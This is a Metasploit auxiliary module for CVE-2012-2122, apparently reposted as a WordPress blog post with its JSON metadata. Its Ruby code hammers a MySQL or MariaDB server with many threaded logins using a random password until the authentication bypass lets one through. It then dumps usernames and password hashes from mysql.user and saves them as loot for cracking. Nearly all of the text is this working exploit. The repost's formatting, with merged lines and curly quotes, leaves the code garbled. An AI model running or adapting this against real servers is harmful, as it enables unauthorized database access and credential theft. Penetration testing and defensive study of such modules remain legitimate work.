##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n
require ‘rex\/proto\/mysql\/client’<\/p>\n
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::MYSQL
include Msf::Auxiliary::Report<\/p>\n
include Msf::Auxiliary::Scanner<\/p>\n
def initialize
super(
‘Name’ => ‘MySQL Authentication Bypass Password Dump’,
‘Description’ => %Q{
This module exploits a password bypass vulnerability in MySQL in order
to extract the usernames and encrypted password hashes from a MySQL server.
These hashes are stored as loot for later cracking.<\/p>\n
Impacts MySQL versions:
– 5.1.x before 5.1.63
– 5.5.x before 5.5.24
– 5.6.x before 5.6.6<\/p>\n
And MariaDB versions:
– 5.1.x before 5.1.62
– 5.2.x before 5.2.12
– 5.3.x before 5.3.6
– 5.5.x before 5.5.23
},
‘Author’ => [
‘theLightCosine’, # Original hashdump module
‘jcran’ # Authentication bypass bruteforce implementation
],
‘References’ => [
[‘CVE’, ‘2012-2122’],
[‘OSVDB’, ‘82804’],
[‘URL’, ‘https:\/\/www.rapid7.com\/blog\/post\/2012\/06\/11\/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql\/’]],
‘DisclosureDate’ => ‘Jun 09 2012’,
‘License’ => MSF_LICENSE
)<\/p>\n
deregister_options(‘PASSWORD’)
register_options( [
OptString.new(‘USERNAME’, [ true, ‘The username to authenticate as’, “root” ])
])
end<\/p>\n
def run_host(ip)<\/p>\n
# Keep track of results (successful connections)
results = []\n
# Username and password placeholders
username = datastore[‘USERNAME’]password = Rex::Text.rand_text_alpha(rand(8)+1)<\/p>\n
# Do an initial check to see if we can log into the server at all<\/p>\n
begin
socket = connect(false)
close_required = true
mysql_client = ::Rex::Proto::MySQL::Client.connect(rhost, username, password, nil, rport, io: socket)
results << mysql_client
close_required = false<\/p>\n
print_good “#{mysql_client.peerhost}:#{mysql_client.peerport} The server accepted our first login as #{username} with a bad password. URI: mysql:\/\/#{username}:#{password}@#{mysql_client.peerhost}:#{mysql_client.peerport}”<\/p>\n
rescue ::Rex::Proto::MySQL::Client::HostNotPrivileged
print_error “#{rhost}:#{rport} Unable to login from this host due to policy (may still be vulnerable)”
return
rescue ::Rex::Proto::MySQL::Client::AccessDeniedError
print_good “#{rhost}:#{rport} The server allows logins, proceeding with bypass test”
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error “#{rhost}:#{rport} Error: #{e}”
return
ensure
socket.close if socket && close_required
end<\/p>\n
# Short circuit if we already won
if results.length > 0
self.mysql_conn = results.first
return dump_hashes(mysql_client.peerhost, mysql_client.peerport)
end<\/p>\n
#
# Threaded login checker
#
max_threads = 16
cur_threads = []\n
# Try up to 1000 times just to be sure
queue = [*(1 .. 1000)]\n
while(queue.length > 0)
while(cur_threads.length < max_threads)<\/p>\n
# We can stop if we get a valid login
break if results.length > 0<\/p>\n
# keep track of how many attempts we’ve made
item = queue.shift<\/p>\n
# We can stop if we reach 1000 tries
break if not item<\/p>\n
# Status indicator
print_status “#{rhost}:#{rport} Authentication bypass is #{item\/10}% complete” if (item % 100) == 0<\/p>\n
t = Thread.new(item) do |count|
begin
# Create our socket and make the connection
close_required = true
s = connect(false)
mysql_client = ::Rex::Proto::MySQL::Client.connect(rhost, username, password, nil, rport, io: s)<\/p>\n
print_good “#{mysql_client.peerhost}:#{mysql_client.peerport} Successfully bypassed authentication after #{count} attempts. URI: mysql:\/\/#{username}:#{password}@#{rhost}:#{rport}”
results << mysql_client
close_required = false
rescue ::Rex::Proto::MySQL::Client::AccessDeniedError
rescue ::Exception => e
print_bad “#{rhost}:#{rport} Thread #{count}] caught an unhandled exception: #{e}”
ensure
s.close if socket && close_required
end
end<\/p>\n
cur_threads << t
end<\/p>\n
# We can stop if we get a valid login
break if results.length > 0<\/p>\n
# Add to a list of dead threads if we’re finished
cur_threads.each_index do |ti|
t = cur_threads[ti]if not t.alive?
cur_threads[ti] = nil
end
end<\/p>\n
# Remove any dead threads from the set
cur_threads.delete(nil)<\/p>\n
::IO.select(nil, nil, nil, 0.25)
end<\/p>\n
# Clean up any remaining threads
cur_threads.each {|x| x.kill }<\/p>\n
if results.length > 0
print_good(“#{mysql_client.peerhost}:#{mysql_client.peerport} Successfully exploited the authentication bypass flaw, dumping hashes…”)
self.mysql_conn = results.first
return dump_hashes(mysql_client.peerhost, mysql_client.peerport)
end<\/p>\n
print_error(“#{rhost}:#{rport} Unable to bypass authentication, this target may not be vulnerable”)
end<\/p>\n
def dump_hashes(host, port)<\/p>\n
# Grabs the username and password hashes and stores them as loot
res = mysql_query(“SELECT user,password from mysql.user”)
if res.nil?
print_error(“#{host}:#{port} There was an error reading the MySQL User Table”)
return<\/p>\n
end<\/p>\n
# Create a table to store data
tbl = Rex::Text::Table.new(
‘Header’ => ‘MysQL Server Hashes’,
‘Indent’ => 1,
‘Columns’ => [‘Username’, ‘Hash’])<\/p>\n
if res.size > 0
res.each do |row|
next unless (row[0].to_s + row[1].to_s).length > 0
tbl << [row[0], row[1]]print_good(“#{host}:#{port} Saving HashString as Loot: #{row[0]}:#{row[1]}”)
end
end<\/p>\n
this_service = nil
if framework.db and framework.db.active
this_service = report_service(
:host => host,
:port => port,
:name => ‘mysql’,
:proto => ‘tcp’
)
end<\/p>\n
report_hashes(tbl.to_csv, this_service, host, port) unless tbl.rows.empty?<\/p>\n
end<\/p>\n
# Stores the Hash Table as Loot for Later Cracking
def report_hashes(hash_loot,service, host, port)
filename= “#{host}-#{port}_mysqlhashes.txt”
path = store_loot(“mysql.hashes”, “text\/plain”, host, hash_loot, filename, “MySQL Hashes”, service)
print_good(“#{host}:#{port} Hash Table has been saved: #{path}”)<\/p>\n
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"
### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## require ‘rex\/proto\/mysql\/client’ class MetasploitModule < Msf::Auxiliaryinclude Msf::Exploit::Remote::MYSQLinclude Msf::Auxiliary::Report include Msf::Auxiliary::Scanner def initializesuper(‘Name’ => ‘MySQL Authentication Bypass Password Dump’,‘Description’ => %Q{This module exploits a password bypass vulnerability in MySQL in orderto extract the usernames and encrypted password hashes from a MySQL server.These hashes are stored as loot …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59368","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59368","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59368"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59368\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59368"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59368"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59368"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}